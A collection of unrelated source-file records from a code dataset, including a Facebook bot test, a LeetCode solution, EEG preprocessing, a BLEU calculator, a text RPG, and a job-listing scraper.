str(reply_data['entry'][0]['changes'][0]['value']['sender_id'])\n srv_channel.on_active()\n efc_channel.on_active()\n srv_channel.save()\n efc_channel.save()\n\n self.assertEqual(FacebookPost.objects.count(), 0)\n\n self.fb_bot.start()\n\n for idx in xrange(MAX_TIMEOUT):\n time.sleep(1)\n if self.fb_bot.is_running():\n break\n else:\n self.fail(\"Bot never got started after waiting %s seconds.\" % MAX_TIMEOUT)\n\n self.fb_bot.post_received(json.dumps(post_data))\n\n for idx in xrange(MAX_TIMEOUT):\n time.sleep(1)\n if not (self.fb_bot.is_busy() or self.fb_bot.is_blocked()):\n break\n else:\n self.fail(\"Post processing did not finish after waiting %s seconds\" % MAX_TIMEOUT)\n\n self.assertEqual(FacebookPost.objects.count(), 1)\n created_post = FacebookPost.objects.find_one()\n self.assertTrue(isinstance(created_post.user_profile, UserProfile))\n self.assertDictEqual(created_post.user_profile.platform_data,\n {'first_name': 'Mnt1',\n 'gender': 'female',\n 'id': '100008124789809',\n 'last_name': 'Poster',\n 'link': 'https://www.facebook.com/profile.php?id=100008124789809',\n 'locale': 'en_US',\n 'name': 'Mnt Poster',\n 'picture': {'data': {'is_silhouette': True,\n 'url': 'https://fbcdn-profile-a.akamaihd.net/hprofile-ak-xpf1/t1.0-1/c15.0.50.50/p50x50/1509246_10150002137498325_1584423246374331045_n.jpg'}},\n 'updated_time': '2014-04-04T12:11:53+0000'})\n self.assertEqual(created_post.content, 'Testing post-reply pair')\n self.assertTrue(str(srv_channel.inbound_channel.id) in created_post.channel_assignments)\n self.assertEqual(created_post.channel_assignments[str(srv_channel.inbound_channel.id)], 'highlighted')\n\n self.fb_bot.post_received(json.dumps(reply_data))\n\n for idx in xrange(MAX_TIMEOUT):\n time.sleep(1)\n if not (self.fb_bot.is_busy() or self.fb_bot.is_blocked()):\n break\n else:\n self.fail(\"Post processing did not finish after waiting %s seconds\" % MAX_TIMEOUT)\n\n self.assertEqual(FacebookPost.objects.count(), 2)\n created_reply = [p for p in FacebookPost.objects() if p.content == 'Thanks for reaching out. 
Testing scenario'][0]\n self.assertTrue(str(srv_channel.outbound_channel.id) in created_reply.channel_assignments)\n self.assertTrue(isinstance(created_reply.user_profile, UserProfile))\n self.assertDictEqual(created_reply.user_profile.platform_data,\n {'first_name': 'Mnt',\n 'gender': 'female',\n 'id': '100008145211355',\n 'last_name': 'Poster',\n 'link': 'https://www.facebook.com/profile.php?id=100008145211355',\n 'locale': 'en_US',\n 'name': 'Mnt Creator',\n 'picture': {'data': {'is_silhouette': True,\n 'url': 'https://fbcdn-profile-a.akamaihd.net/hprofile-ak-xpf1/t1.0-1/c15.0.50.50/p50x50/1509246_10150002137498325_1584423246374331045_n.jpg'}},\n 'updated_time': '2014-04-04T12:11:53+0000'})\n\n for idx in xrange(MAX_TIMEOUT * 4):\n created_post.reload()\n if created_post.channel_assignments[str(srv_channel.inbound_channel.id)] == 'replied':\n break\n else:\n self.fail(\"Inbound post was never switched to replied status\")\n\n self.fb_bot.stop()\n\n for idx in xrange(MAX_TIMEOUT * 4):\n time.sleep(1)\n if not self.fb_bot.isAlive():\n break\n else:\n self.fail(\"Bot never stopped after waiting %s seconds.\" % (4 * MAX_TIMEOUT))\n\n","sub_path":"tests/social/test_facebook_bot.py","file_name":"test_facebook_bot.py","file_ext":"py","file_size_in_byte":23457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"413530526","text":"\"\"\"\n1338. Reduce Array Size to The Half\nMedium\n\nGiven an array arr. You can choose a set of integers and remove all the occurrences of these integers in the array.\n\nReturn the minimum size of the set so that at least half of the integers of the array are removed.\n\nExample 1:\n\nInput: arr = [3,3,3,3,5,5,5,2,2,7]\nOutput: 2\nExplanation: Choosing {3,7} will make the new array [5,5,5,2,2] which has size 5 (i.e equal to half of the size of the old array).\nPossible sets of size 2 are {3,5},{3,2},{5,2}.\nChoosing set {2,7} is not possible as it will make the new array [3,3,3,3,5,5,5] which has size greater than half of the size of the old array.\n\nExample 2:\n\nInput: arr = [7,7,7,7,7,7]\nOutput: 1\nExplanation: The only possible set you can choose is {7}. This will make the new array empty.\n\nExample 3:\n\nInput: arr = [1,9]\nOutput: 1\n\nExample 4:\n\nInput: arr = [1000,1000,3,7]\nOutput: 1\n\nExample 5:\n\nInput: arr = [1,2,3,4,5,6,7,8,9,10]\nOutput: 5\n \nConstraints:\n\n1 <= arr.length <= 10^5\narr.length is even.\n1 <= arr[i] <= 10^5\n\"\"\"\n\nfrom typing import List\nfrom collections import Counter\n\n###############################################################################\n\"\"\"\nSolution: greedy\n\nHave to return minimum set size, so want to include the most frequent\nvalues first. 
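Worked example: for arr = [3,3,3,3,5,5,5,2,2,7] the threshold is (10 + 1) // 2 = 5 and the descending counts are [4, 3, 2, 1]; 4 < 5 but 4 + 3 = 7 >= 5, so the minimum set size is 2.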
Use collections.Counter(arr).values() and reverse sort.\nThen count how many (unique) values need to be added together.\n\"\"\"\nclass Solution:\n def minSetSize(self, arr: List[int]) -> int:\n # want to be able to remove at least this many elts\n threshold = (len(arr) + 1) // 2 \n \n counts = list(Counter(arr).values())\n counts.sort(reverse=True)\n n_counts = len(counts)\n \n i = 0\n count = 0\n \n while i < n_counts and count < threshold:\n count += counts[i]\n i += 1\n \n return i\n\n###############################################################################\n\nif __name__ == \"__main__\":\n def test(arr, comment=None):\n res = s.minSetSize(arr)\n \n print(\"=\"*80)\n if comment:\n print(comment)\n \n print(f\"\\n{arr}\")\n print(f\"\\nres = {res}\")\n\n\n s = Solution()\n\n comment = \"LC ex1; answer = 2\"\n arr = [3,3,3,3,5,5,5,2,2,7]\n test(arr, comment)\n\n comment = \"LC ex2; answer = 1\"\n arr = [7,7,7,7,7,7]\n test(arr, comment)\n\n comment = \"LC ex3, answer = 1\"\n arr = [1,9]\n test(arr, comment)\n\n comment = \"LC ex4, answer = 1\"\n arr = [1000,1000,3,7]\n test(arr, comment)\n\n comment = \"LC ex5, answer = 5\"\n arr = [1,2,3,4,5,6,7,8,9,10]\n test(arr, comment)\n\n comment = \"LC test case; answer = 5\"\n arr = [9,77,63,22,92,9,14,54,8,38,18,19,38,68,58,19]\n test(arr, comment)\n","sub_path":"array/1338_reduce_array_size_to_half.py","file_name":"1338_reduce_array_size_to_half.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"442713558","text":"from ussociety.MatFile import *\nfrom ussociety.Subject import *\nfrom SignalUtils import *\nfrom Setting import *\nimport glob\n\nclass Processor:\n def __init__(self):\n self.setting = Setting()\n self.matFileInstance = MatFile()\n self.subjectInstance = Subject()\n self.signalUtilInstance = SignalUtils()\n self.trainDir = \"/home/xiaobin/Disk/trainData\"\n #self.testDir = \"/home/xiaobin/Disk/testData\"\n self.subjectName = \"\"\n\n def processDataPerMatFile(self,dataFile,trainOrTest=\"train\"):\n self.matFileInstance.readMat(dataFile)\n self.matFileInstance.name = dataFile\n self.matFileInstance.samplingRate = 400\n self.matFileInstance.data = self.signalUtilInstance.resample(self.matFileInstance.data, 400)\n self.matFileInstance.data = self.signalUtilInstance.butterWorthBandpassFilter(self.matFileInstance.data, band=[0.1, 180], frequency = 400)\n #this is for comparison solution\n #self.matFileInstance.data = self.signalUtilInstance.butterWorthBandpassFilter(self.matFileInstance.data, band=[0.5, 128], frequency = 256)\n\n matPerSlot = self.matFileInstance.getDataListPerTimeSlot(timeslot = self.matFileInstance.timeLength)\n size = matPerSlot.shape\n size = size[0]\n\n #self.matFileInstance.data = self.signalUtilInstance.resample(self.matFileInstance.data, 400)\n #self.matFileInstance.data = self.signalUtilInstance.butterWorthBandpassFilter(matPerSlot[0].data, band=[0.1, 180], frequency = 400)\n\n #fft\n #matFileInstance.data = util.fft(matFileInstance.data)\n #self.matFileInstance.data = self.signalUtilInstance.daubWavelet(self.matFileInstance.data)\n\n #self.matFileInstance.data = self.signalUtilInstance.resample(self.matFileInstance.data, 400)\n sizex,sizey = matPerSlot[0].data.shape\n\n matBagX = numpy.zeros((size,sizex,sizey))\n matBagY = []\n\n matBagX[0, :, :] = matPerSlot[0].data\n\n if trainOrTest == \"train\":\n matBagY.append(self.matFileInstance.getSeizureOnsetLabel())\n elif trainOrTest == \"test\":\n 
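# (comment added for clarity) test files carry no seizure label, so the\n            # source file name is stored as the \"label\" instead, letting each\n            # segment be traced back to its .mat file later.\n            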
matBagY.append(self.matFileInstance.name.split(\"/\")[-1])\n\n        for i in xrange(1,size):\n            #self.matFileInstance.data = self.signalUtilInstance.resample(self.matFileInstance.data, 400)\n            #self.matFileInstance.data = self.signalUtilInstance.butterWorthBandpassFilter(matPerSlot[i].data, band=[0.1, 180], frequency = 400)\n            #self.matFileInstance.data = self.signalUtilInstance.daubWavelet(self.matFileInstance.data)\n            matBagX[i, :, :] = matPerSlot[i].data\n            if trainOrTest == \"train\":\n                #matBagY[i, :, :] = self.matFileInstance.getSeizureOnsetLabel()\n                matBagY.append(self.matFileInstance.getSeizureOnsetLabel())\n            elif trainOrTest == \"test\":\n                matBagY.append(self.matFileInstance.name.split(\"/\")[-1])\n\n        return matBagX, matBagY\n\n    def processDataPerSubject(self,subject, splitNum = 10, sequence = 0, trainOrTest = \"train\"):\n        dataList = None\n        if trainOrTest == \"train\":\n            dataList = self.subjectInstance.getTrainFileList(subject)\n        elif trainOrTest == \"test\":\n            dataList = self.subjectInstance.getTestFileList(subject)\n        else:\n            raise ValueError(\"trainOrTest error\")\n\n        if subject.find(\"Dog\") != -1:\n            index = subject.find(\"Dog\")\n            self.subjectName = subject[index : index + len(\"Dog\") + 2]\n        else:\n            index = subject.find(\"Patient\")\n            self.subjectName = subject[index : index + len(\"Patient\") + 2 ]\n        amount = None\n        if len(dataList) % splitNum == 0:\n            amount = len(dataList) / splitNum\n        else:\n            amount = len(dataList) / splitNum + 1\n        for i in xrange(splitNum):\n            if i == sequence:\n                return self.processData(dataList[i * amount: (i + 1)*amount],sequence = sequence, trainOrTest = trainOrTest)\n\n    def processData(self,trainList,sequence = 0,trainOrTest = \"train\"):\n        dim0 = len(trainList)\n        if dim0 == 0:\n            raise ValueError(\"trainList is empty\")\n        X,Y = self.processDataPerMatFile(trainList[0],trainOrTest = trainOrTest)\n        xdim0,xdim1,xdim2 = X.shape\n        dim0 = dim0 * xdim0\n\n        trainDataX = numpy.zeros((dim0, xdim1, xdim2))\n        trainDataY = []\n        trainDataX[0:xdim0,:,:] = X\n        trainDataY += Y\n        #if trainOrTest == \"train\":\n        #    #trainDataY = numpy.zeros_like(trainDataX)\n        #    trainDataX[0:xdim0,:,:] = X\n        #    trainDataY[0:xdim0,:,:] = Y\n        #elif trainOrTest == \"test\":\n        #    trainDataY = []\n        #    trainDataX[0:xdim0,:,:] = X\n        #    trainDataY += Y\n        for i in xrange(1,len(trainList)):\n            tempX, tempY = self.processDataPerMatFile(trainList[i],trainOrTest = trainOrTest)\n            trainDataX[i * xdim0: (i + 1) * xdim0, :, :] = tempX\n            #if trainOrTest == \"train\":\n            #    trainDataY[i * xdim0: (i + 1) * xdim0,:,:] = tempY\n            #elif trainOrTest == \"test\":\n            trainDataY += tempY\n        #self.saveDataToDisk(trainDataX, trainDataY, sequence, trainOrTest)\n\n        return trainDataX,trainDataY\n\n    def saveDataToDisk(self,trainDataX,trainDataY,sequence = 0, trainOrTest = \"train\"):\n\n        if trainOrTest == \"train\":\n            numpy.save(self.trainDir + \"/\" + self.subjectName + \"/trainX_\" + str(sequence), trainDataX)\n            numpy.save(self.trainDir + \"/\" + self.subjectName + \"/trainY_\" + str(sequence), trainDataY)\n        elif trainOrTest == \"test\":\n            numpy.save(self.trainDir + \"/\" + self.subjectName + \"/testX_\" + str(sequence), trainDataX)\n            numpy.save(self.trainDir + \"/\" + self.subjectName + \"/testY_\" + str(sequence), numpy.array(trainDataY))\n        else:\n            raise ValueError(\"save error : train or test\")\n        #scipy.io.savemat(self.trainDir + \"/trainX_\" + timeStr,{\"data\":trainDataX})\n        #scipy.io.savemat(self.trainDir + \"/trainY_\" + timeStr,{\"data\":trainDataY})\n        #del trainDataX\n        #del trainDataY\n\n    def loadDataFromDisk(self,sequence = 0, trainOrTest = \"train\"):\n        trainX = None\n        trainY = None\n        #files = os.listdir(self.trainDir + \"/\" + self.subjectName)\n        files = glob.glob(self.trainDir + \"/\" + self.subjectName + \"/*.npy\")\n        files = sorted(files)\n        count = 0\n        for f in files:\n            if trainOrTest == \"train\":\n                if \"trainX\" in f:\n                    # only the file pair matching the requested sequence index is loaded\n                    if count == sequence:\n                        #trainX = numpy.load(self.trainDir + \"/\" + self.subjectName + \"/\" + f)\n                        trainX = numpy.load(f)\n                        #trainX = scipy.io.loadmat(f)[\"data\"]\n                        f = f.replace(\"trainX\",\"trainY\")\n                        #trainY = numpy.load(self.trainDir + \"/\" + self.subjectName + \"/\" + f)\n                        trainY = numpy.load(f)\n                        #trainY = scipy.io.loadmat(f)[\"data\"]\n                        return trainX, trainY\n                    count += 1\n            elif trainOrTest == \"test\":\n                if \"testX\" in f:\n                    if count == sequence:\n                        testX = numpy.load(f)\n                        f = f.replace(\"testX\",\"testY\")\n                        testY = numpy.load(f)\n                        return testX, testY\n                    count += 1\n\n        return None\n    def rebalanceData(self,x, y,mode=\"SMOTE\", trainOrTest = \"train\", rebalanceInstance = None):\n        if mode == \"SMOTE\":\n            if trainOrTest == \"train\":\n                verbose = False\n                ratio = float(numpy.count_nonzero( y == 1)) / float(numpy.count_nonzero(y == 0))\n                smoteInstance = SMOTE(ratio = ratio, verbose = verbose,kind = \"regular\")\n                smoteDataX, smoteDataY = smoteInstance.fit_transform(x, y)\n\n                return smoteInstance, smoteDataX, smoteDataY\n            elif trainOrTest == \"test\":\n                if rebalanceInstance is None:\n                    raise ValueError(\"rebalanceInstance can not be none when the data is for testing\")\n                else:\n                    smoteDataX = rebalanceInstance.transform(x)\n                    return smoteDataX\n\n","sub_path":"preprocessing/Processor.py","file_name":"Processor.py","file_ext":"py","file_size_in_byte":8191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"}
+{"seq_id":"52658869","text":"\"\"\"\n@Project :20180821\n@Time :2018/8/21 10:29\n@Author :Zhenxian\n@File :查票.py\n@Software :PyCharm\n\"\"\"\nfrom multiprocessing import Lock, Process\nimport time\nimport random\n\n\ndef check(b):\n    with open('info') as f:\n        con = f.read()\n    print(\"Person %s checked: %s tickets remaining\" % (b, con))\n\n\ndef buy(b, lo):\n    lo.acquire()\n    with open('info') as f:\n        con = int(f.read())\n    time.sleep(1)\n    if con > 0:\n        con -= 1\n        print(\"\\033[32mPerson %s bought a ticket, %s tickets left\\033[0m\" % (b, con))\n    else:\n        print(\"\\033[31mPerson %s could not buy a ticket, none left\\033[0m\" % b)\n    time.sleep(1)\n    with open('info', mode='w') as f1:\n        f1.write(str(con))\n    lo.release()\n\n\nif __name__ == '__main__':\n    l = Lock()\n    for i in range(100):\n        p_ch = Process(target=check, args=(i + 1,))\n        p_ch.start()\n    for i in range(100):\n        p_buy = Process(target=buy, args=(i + 1, l))\n        p_buy.start()\n","sub_path":"20180821/查票.py","file_name":"查票.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"}
+{"seq_id":"43553211","text":"import uuid\nfrom django.http import HttpResponseBadRequest\nfrom rest_framework import generics, permissions\nfrom rest_framework.response import Response\n\nfrom api.efiling import (\n    upload_documents\n)\n\n\nclass EfilingDocumentView(generics.GenericAPIView):\n    permission_classes = (permissions.IsAuthenticated,)\n\n    def post(self, request):\n        transaction_id = str(uuid.uuid4())\n        if (len(request.FILES) == 0):\n            return HttpResponseBadRequest(\"No files uploaded.\")\n        universal_id = request.user.universal_id\n        result = upload_documents(\n            universal_id, transaction_id, request.FILES\n        )\n        return Response({\"transactionId\": transaction_id, \"result\": 
result})\n","sub_path":"api/api/views/efiling_document_view.py","file_name":"efiling_document_view.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"359324622","text":"import sys\nimport codecs\nimport glob\nimport math\n\nclass bleu:\n def __init__(self):\n self.reference_files=[]\n self.candidate_file=codecs.open(sys.argv[1],\"r\", \"utf-8\")\n self.candidate=[]\n self.references=[]\n self.best_len=[]\n \n def open_ref_file(self):\n if \".txt\" in sys.argv[2]:\n self.reference_files.append(codecs.open(sys.argv[2],\"r\",\"utf-8\"))\n else:\n for file in glob.glob(sys.argv[2]+\"/*.txt\"):\n self.reference_files.append(codecs.open(file,\"r\",\"utf-8\"))\n\n def read_content(self):\n self.candidate=self.candidate_file.read().split(\"\\n\")\n for files in self.reference_files:\n self.references.append(files.read().split(\"\\n\"))\n\n def generatengram(self,line,n):\n split_lines=line.split()\n word=[]\n i=0\n while (i+n-1)sum(bl.best_len):\n BP=1.0\n else:\n BP=math.exp(1-((sum(bl.best_len)*1.0)/candidate_len)) \n pn=bl.calculate_precision(2)\n if pn != 0:\n log_sum+=wn*math.log(pn)\n else:\n log_sum+=0\n pn=bl.calculate_precision(3)\n if pn != 0:\n log_sum+=wn*math.log(pn)\n else:\n log_sum+=0\n pn=bl.calculate_precision(4)\n if pn != 0:\n log_sum+=wn*math.log(pn)\n else:\n log_sum+=0\n bleu_score=BP*math.exp(log_sum)\n output=open(\"bleu_out.txt\", \"w\")\n output.write(str(bleu_score))\n \nif __name__ == \"__main__\":main()","sub_path":"NLP/Bleu_score_calculator/calculatebleu.py","file_name":"calculatebleu.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"332880187","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport unittest\nfrom unittest.mock import MagicMock\n\nfrom io import StringIO\nfrom textwrap import dedent\n\nfrom hevelli.inputsources import InputSource \nfrom hevelli.parser import RecipeParser\nimport hevelli.errors as errors\n\n\n\nclass ErrorMixin:\n \n def test_error(self):\n text = StringIO(self.content)\n def dummy(*args): return MagicMock() \n parser = RecipeParser(\n None, {k:dummy for k in self.keys}) \n with InputSource(text) as inp:\n with self.assertRaises(errors.ParserError) as cm:\n parser.parse(inp)\n\n e = cm.exception\n self.assertIs(e.inputsrc, inp)\n self.assertEqual(e.inputsrc.line_num, self.line_num)\n self.assertEqual(e.inputsrc.line, self.line)\n \n\nclass Unknown(ErrorMixin, unittest.TestCase):\n\n content = \"\"\"\n file bla\n \"\"\"\n\n keys = ['test']\n line_num=2\n line='file bla'\n \nclass KnownAndUnknown(ErrorMixin, unittest.TestCase):\n\n content = \"\"\"\n test foo\n file bla\n \"\"\"\n\n keys = ['test']\n line_num=3\n line='file bla'\n \nclass NoArgs(ErrorMixin, unittest.TestCase):\n\n content = \"\"\"\n test\n file\n \"\"\"\n\n keys = ['test']\n line_num=3\n line='file'\n\n \nclass RecipeMixin:\n \n def test_recipe(self):\n text = StringIO(self.content)\n section_parsers = {k:MagicMock() for k in self.keys}\n world = object()\n parser = RecipeParser(world, section_parsers)\n \n inp = InputSource(text)\n with inp:\n parser.parse(inp)\n\n for key, mock in section_parsers.items():\n self.assertEqual(mock.call_count, self.keys[key])\n mock.assert_called_with(inp, world)\n \n\n \nclass WithEnd(RecipeMixin, unittest.TestCase):\n\n content = \"\"\"\n test\n end\n test\n file\n test\n end\n \"\"\"\n\n keys = {'test':3, 'file':1, 'end':2}\n \n 
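\n\n# A hypothetical minimal case, added for illustration (not part of the\n# original suite): each recognized section name occurs once, so each\n# parser mock should be called exactly once.\nclass MinimalRecipe(RecipeMixin, unittest.TestCase):\n\n    content = \"\"\"\n    test\n    end\n    \"\"\"\n\n    keys = {'test': 1, 'end': 1}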
\n","sub_path":"tests/test_recipeparser.py","file_name":"test_recipeparser.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"233259637","text":"#!/usr/bin/env python\nfrom app.model.profile_response import ProfileResponse\n\n\"\"\"\n@author bvanderlaan\n\"\"\"\n\n\nclass TestProfileResponse:\n def test_count_languages(self):\n pr = ProfileResponse(\n 1,\n 2,\n 3,\n [\"Java\", \"java\", \"Python\", \"Ruby\"],\n [\"Java is coffee\", \"Ruby is shiny\", \"Python is slippery\"],\n )\n expected = [{\"java\": 2}, {\"python\": 1}, {\"ruby\": 1}]\n assert expected == pr.get_counts(pr.languages)\n\n def test_count_languages_empty(self):\n pr = ProfileResponse(\n 1, 2, 3, [], [\"Java is coffee\", \"Ruby is shiny\", \"Python is slippery\"]\n )\n expected = []\n assert expected == pr.get_counts(pr.languages)\n\n def test_json_format(self):\n pr = ProfileResponse(\n 1,\n 2,\n 3,\n [\"Java\", \"Python\", \"Ruby\"],\n [\"Java is coffee\", \"Ruby is shiny\", \"Python is slippery\"],\n )\n expected = {\n \"languages\": [{\"java\": 1}, {\"python\": 1}, {\"ruby\": 1}],\n \"repo_topics\": [\n {\"java is coffee\": 1},\n {\"ruby is shiny\": 1},\n {\"python is slippery\": 1},\n ],\n \"total_repos\": {\"forked\": 3, \"original\": 1},\n \"total_watchers\": 2,\n }\n assert expected == pr.json_format()\n\n def test_json_format_empty(self):\n pr = ProfileResponse(0, 0, 0, [], [])\n expected = {\n \"languages\": [],\n \"repo_topics\": [],\n \"total_repos\": {\"forked\": 0, \"original\": 0},\n \"total_watchers\": 0,\n }\n assert expected == pr.json_format()\n","sub_path":"app/model/test/profile_response_test.py","file_name":"profile_response_test.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"423441562","text":"import random\n\n\nclass Character:\n def __init__(self, name, hp, ac, dmg, defense):\n self.name = name\n self.hp = hp\n self.ac = ac\n self.dmg = dmg\n self.defense = defense\n\n def attack(self, opponent):\n roll = random.randint(1, 20)\n print('{} rolled a {}'.format(self.name, roll))\n if roll > opponent.ac and roll < 17:\n print(\"{} delt {} damage to the {}\".format(\n self.name, str(self.dmg - opponent.defense), opponent.name))\n opponent.hp -= (self.dmg - opponent.defense)\n elif roll > opponent.ac and roll >= 17:\n print('{} crits and deals double damage!'.format(self.name))\n opponent.hp -= (self.dmg * 2 - opponent.defense)\n else:\n print('You missed!')\n\n def alive(self):\n return self.hp > 0\n\n def print_status(self):\n print(\"{} has {} hit points\".format(self.name, self.hp))\n\n\nclass Hero(Character):\n def __init__(self, name, hp, ac, dmg, defense, coins):\n super().__init__(name, hp, ac, dmg, defense)\n self.coins = coins\n self.inventory = []\n\n\nclass Monster(Character):\n def __init__(self, name, hp, ac, dmg, defense, bounty):\n super().__init__(name, hp, ac, dmg, defense)\n self.bounty = bounty\n\n\nclass Healing_Potion(object):\n cost = 5\n name = 'healing potion'\n\n def apply(self, hero):\n hero.hp += 2\n print(\"{}'s health increased to {}.\".format(hero.name, hero.hp))\n\n\nclass Defense_Potion(object):\n cost = 5\n name = 'defense potion'\n\n def apply(self, hero):\n hero.defense = 2\n print(\"{}'s will now take 2 less damage from opponents!\".format(\n hero.name))\n\n\nclass Great_Sword(object):\n cost = 10\n name = 'sword'\n\n def apply(self, hero):\n hero.dmg += 2\n print(\"{}'s 
power increased to {}.\".format(hero.name, hero.dmg))\n\n\nclass Armor(object):\n cost = 10\n name = 'armor'\n\n def apply(self, hero):\n hero.ac += 2\n print(\"{}'s AC has increased to {}!\".format(hero.name, hero.ac))\n\n\nclass Store(object):\n items = [Healing_Potion, Defense_Potion, Great_Sword, Armor]\n\n def do_shopping(self, hero):\n while True:\n print(\"=====================\")\n print(\"Welcome to the store!\")\n print(\"=====================\")\n print(\"You have {} coins.\".format(hero.coins))\n print(\"What would you like to do?\")\n for i in range(len(Store.items)):\n item = Store.items[i]\n print(\"{}. buy {} ({})\".format(i + 1, item.name, item.cost))\n print(\"5. leave\")\n inp = int(input(\"> \"))\n if inp == 1:\n heal = Healing_Potion()\n if hero.coins >= heal.cost:\n heal.apply(hero)\n hero.coins -= heal.cost\n else:\n print(\"You don't have enough coins!\")\n elif inp == 2:\n defense = Defense_Potion()\n if hero.coins >= defense.cost:\n defense.apply(hero)\n hero.coins -= defense.cost\n else:\n print(\"You don't have enough coins!\")\n elif inp == 3:\n sword = Great_Sword()\n if hero.coins >= sword.cost:\n sword.apply(hero)\n hero.coins -= sword.cost\n else:\n print(\"You don't have enough coins!\")\n elif inp == 4:\n armor = Armor()\n if hero.coins >= armor.cost:\n armor.apply(hero)\n hero.coins -= armor.cost\n else:\n print(\"You don't have enough coins!\")\n else:\n print(\"Come again!\")\n cont()\n break\n\n\ndef cont():\n ans = int(\n input(\"\"\"Would you like to: \n1. Continue adventuring\n2. Go to the store\n3. Go home\n> \"\"\"))\n if ans == 1:\n fight()\n elif ans == 2:\n store = Store()\n store.do_shopping(hero)\n return store\n elif ans == 3:\n print(\"Thank you for your help!\")\n quit()\n else:\n print(\"That's not an option\")\n\n\ndef dm_roll():\n roll = random.randint(1, 20)\n\n if roll > 0 and roll <= 10:\n opponent = Monster('Goblin', 9, 10, 2, 0, 1)\n elif roll > 10 and roll <= 16:\n opponent = Monster('Zombie', 13, 12, 3, 0, 3)\n elif roll > 16 and roll <= 19:\n opponent = Monster('Ogre', 15, 15, 5, 0, 5)\n else:\n opponent = Monster('Dragon', 1000000, 20, 10, 0, 100)\n print(\"You have run into a {}!\".format(opponent.name))\n return opponent\n\n\ndef fight():\n opponent = dm_roll()\n while opponent.alive() and hero.alive():\n hero.print_status()\n opponent.print_status()\n print(\"What do you want to do?\")\n print(\"1. Fight {}\".format(opponent.name))\n print(\"2. Do nothing\")\n print(\"3. Flee\")\n print(\"> \", ' ')\n raw_input = input()\n if raw_input == \"1\":\n # Hero attacks opponent\n hero.attack(opponent)\n if opponent.alive() == False:\n print(\"Victory!!!\")\n print(\"You collect the bounty for the {}, which is {} coins.\".\n format(opponent.name, opponent.bounty))\n hero.coins += opponent.bounty\n print(\"You now have {} coins!\".format(hero.coins))\n cont()\n elif raw_input == \"2\":\n pass\n elif raw_input == \"3\":\n print(\"Run awaaaaaaaayyyy\")\n loss = random.randint(1, 5)\n print(\"As you run away you drop {} coins.\".format(loss))\n hero.coins -= loss\n if hero.coins <= 0:\n print(\"You have no more coins\")\n else:\n print(\"You now have {} coins.\".format(hero.coins))\n cont()\n else:\n print(\"Invalid input {}\".format(raw_input))\n\n if opponent.alive():\n # opponent attacks hero\n opponent.attack(hero)\n if hero.alive() == False:\n print(\"You are dead.\")\n\n\ndef main():\n while True:\n spec = input(\"\"\"Welcome, Adventurer! Are your a Fighter, Cleric, Wizard or a Rogue? 
\n \n Fighter Cleric Wizard Rogue\n --------------------------------------------\n HP 15 15 15 15 \n AC 10 10 10 15\n DMG 10 8 10 8 \n DEF 0 2 0 0\n COINS 15 15 15 20\n \n Your Class: \"\"\").lower()\n if spec == 'fighter':\n hero = Hero('Fighter', 15, 10, 8, 0, 15)\n break\n elif spec == 'cleric':\n hero = Hero('Cleric', 10, 10, 8, 2, 15)\n break\n elif spec == 'wizard':\n hero = Hero('Wizard', 15, 10, 8, 0, 15)\n break\n elif spec == 'rogue':\n hero = Hero('Rogue', 10, 14, 8, 0, 20)\n break\n else:\n print(\"That's not an option!\")\n print(\"\"\"Ah, we sure could use a {}! Thank you for coming to rescue our town. \nThere are many monsters to fight, so let's begin!\"\"\".format(hero.name))\n return hero\n\n\nhero = main()\ncont()\n","sub_path":"rpg_remake.py","file_name":"rpg_remake.py","file_ext":"py","file_size_in_byte":7363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"299965198","text":"import os\nimport shutil\nimport SCons\n\nenv = Environment(ENV=os.environ)\n\noutputName = \"Transition\"\n\ntexName = \"main\"\nbinPath = \"bin/\"\nsrcPath = \"src/\"\ntmpPath = \"tmp/\"\n\nbuildRes = env.PDF(target = tmpPath + texName + \".pdf\", source = srcPath + texName + \".tex\") \nenv.AddPostAction(buildRes, \"cp \" + tmpPath + texName + \".pdf \" + binPath + outputName + \".pdf\") \n","sub_path":"Rapport/Transition/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"57451811","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 16 09:47:44 2017\n\n@author: Administrator\n\"\"\"\nimport requests\nfrom lxml import etree\nimport json\nimport pandas as pd\nimport numpy as np\nfrom pandas import DataFrame,Series\nfrom datetime import datetime\nimport sqlite3\n\nconn = sqlite3.connect('test2.db')\nc = conn.cursor()\n#c.execute('''create table job3\n# (title text,\n# link char(50),\n# category text,\n# num int,\n# city text,\n# time time,\n# jobduties text,\n# jobrequirement text\n# );''')\n#conn.commit()\n\nheader = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',\n 'Accept-Language': 'zh-CN,zh;q=0.8'}\nbaseurl = 'http://hr.tencent.com/'\noffset = 'position.php?&start=0#a'\njoblist = []\n\ndef loadurl(url): \n req = requests.get(url,headers=header)\n body = req.text\n html = etree.HTML(body)\n return html\n\n\ndef findlist(url,meta):\n html = loadurl(url)\n# item = {}\n# \n# item['title']=meta['title']\n# item['link']=meta['link']\n# item['category']=meta['category']\n# item['num']=meta['num']\n# item['city']=meta['city']\n# item['time']=meta['time']\n# item['jobduties'] = html.xpath('//tr[@class=\"c\"][1]/td[@colspan=\"3\"]/ul')[0].xpath('string(.)')\n# item['jobrequirement'] = 